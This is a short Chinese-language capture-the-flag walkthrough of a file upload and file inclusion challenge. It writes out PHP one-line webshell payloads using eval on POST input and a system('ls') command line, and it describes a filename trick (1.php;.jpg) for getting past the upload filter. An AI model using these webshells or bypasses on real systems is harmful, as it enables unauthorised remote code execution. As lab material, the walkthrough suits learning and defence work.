1.
发现注释文件upload.php,访问下来到文件上传页面
Step2:上传一句话
普通一句话会被过滤,这里构造<?=eval($_POST[‘shell’]);>
保存文件修改后缀为1.php;.jpg,成功上传
根据提示是文件包含,直接访问文件路径无效,菜刀无法连接
包含文件进行访问是空白页面,再进行菜刀连接
Step3:上菜刀
2.
上传文件名为1.php;.jpg,绕过检测,包含一下发现一句话的<?php?>这些字符被过滤,从其他文章处看到构造了,
<script language=php>@eval($_POST['cmd']);</script>
菜刀连接被禁止了,又构造命令执行,
<acript language=php>system("ls")</script>
然后上传这句一句话木马,